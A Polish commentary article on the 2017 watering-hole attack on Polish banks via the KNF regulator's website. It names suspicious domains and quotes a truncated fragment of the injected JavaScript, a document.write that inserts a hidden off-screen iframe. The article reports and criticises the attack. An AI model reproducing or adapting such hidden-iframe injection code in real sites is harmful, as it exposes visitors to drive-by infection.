e-Ojczyzna w niebezpieczeństwie!
W czwartek, 3 lutego 2017, przed południem, na oficjalnej, internetowej stronie Komisji Nadzoru Finansowego (www.knf.gov.pl) pojawiła się informacja, że „Na stronie prowadzone są prace serwisowe. Przepraszamy za utrudnienia”.
Niebawem w miejsce komunikatu pojawił się zapisek: Dziennik Urzędowy KNF.
Tak było do końca dnia 3 lutego 2017 roku.
Wcześniej niektóre działające w Polsce banki informowały o problemach ze swoimi, elektronicznymi systemami obsługi klientów.
Od co najmniej tygodnia w świecie polskich bankowców, otwarcie mówi się o skomasowanym, globalnym ataku cyberprzestępców. Specjaliści z branży” twierdzą, że nieznani sprawcy, już jakiś czas temu, uzyskali dostęp do stacji roboczych oraz serwerów w co najmniej kilku bankach i nawet udało im się wykraść zgromadzone w tych „niektórych” bankach dane.
Ponoć bankowcy odnaleźli, w sieciowych strukturach swoich banków niesamowicie wysoko technicznie zaawansowane, nieznane dotychczas używanym narzędziom antywirusowym, złośliwe oprogramowanie. Jest niemal pewne, że zainfekowane zostały zarówno komputery pracowników, jak i bankowe serwery.
Zaistnienie takiej sytuacji potwierdza międzybankowy System Wymiany Ostrzeżeń o Zagrożeniach [SWOZ] . Można w nim znaleźć informacje o potencjalnych symptomach infekcji. Jest też spora lista adresów IP, z których korzystało złośliwe oprogramowanie.
Potwierdzenie znaleźć można także w serwisie PassiveTotal (https://www.passivetotal.org/search/www.knf.gov.pl), który zarejestrował wstrzyknięcie w domenie jednej z urzędowych, polskich instytucji obiekty z domen: eye-watch.in, a także sap.misopor.ch, powszechnie uważanych za co najmniej podejrzane.
Czy wyłączenie domeny Komisji Nadzoru Finansowego ma z tym jakiś związek? W rozmowie z „WP MONEY” lider obszaru cyberbezpieczeństwa w Deloitte, Marcin Ludwiszewski, wprost stwierdził, że „jest to jeden z najpoważniejszych ataków na polski system finansowy. Polska bowiem od lat jest na celowniku hakerów z Rosji i Chin. Do polskich systemów bankowych hakerzy próbują włamać się poprzez strony instytucji urzędowych, bowiem strony rządowe, że względu na niewielkie, przeznaczane cele bezpieczeństwa tych systemów środki nie posiadają odpowiednich, bezpiecznych systemów”.
Atak hakerów na serwery urzędów państwowych nie jest więc przypadkowy. Witryny Komisji Nadzoru Finansowego codziennie odwiedzają setki, a nawet tysiące internautów. Zazwyczaj ludzi biznesu, bakowców, finansistów.
Haker, zagnieżdżając się w tym środowisku, uzyskuje możliwość dostępu do znaczących i – co niezwykle ważne – kształtujących oblicze polskich finansów i gospodarki ogromnej ilości osób, a przede wszystkim ich komputerów. Do zasobów informacyjnych i informatycznych w tych komputerach zgromadzonych.
Zlokalizowany w elektronicznych obszarach KNF, nieautoryzowany kod znajdował się w pliku : http://www.knf.gov.pl/DefaultDesign/Layouts/KNF2013/resources/accordian-src.js?ver=11 i miał następujący wygląd: document.write(„.ch/vishop/view.jsp?pagenum=1’ width=’145px’ height=’146px’ style=’left:-2144px;position:absolute;top<br>:0px;’>”);<br.
Ile komputerów polskich przedsiębiorców, prawników, finansistów, pracowników administracji publicznej i samorządowej mogło z tą informatyczną konfiguracją mieć do czynienia? Ile spośród tych komputerów, ich oprogramowani, przygarnęło TO COŚ w swoje zasoby?
Musi dziwić spokój instytucji i osób odpowiadających w Polsce za nasze internetowe bezpieczeństwo. Za bezpieczeństwo naszych informatycznych intymności. W końcu naszych powierzonych bankom pieniędzy. Dziwić, że z takim spokojem przyglądają się temu, co w Polsce dzieje się za sprawą światowej mafii finansowej?, rekinów gospodarki? wywiadów i wszelkiej maści „detektywów”?, w końcu najpospolitszych internetowych złodziei?
Dlaczego nikt, od co najmniej października 2016 roku, bo wówczas, bezdyskusyjnie stwierdzono, że polski system finansowo-bankowy jest inwigilowany, nie upowszechnił ostrzegawczych informacji?
Dlaczego Polaków nie poinformowano o zagrożeniu?
Dlaczego nie wskazano, jak mamy się zachowywać, by skutecznie włączyć się w walkę o naszą e-Ojczyznę?
Dlaczego, Panie Prezydencie Andrzeju Duda?
Dlaczego, Pani Premier Beato Szydło ?
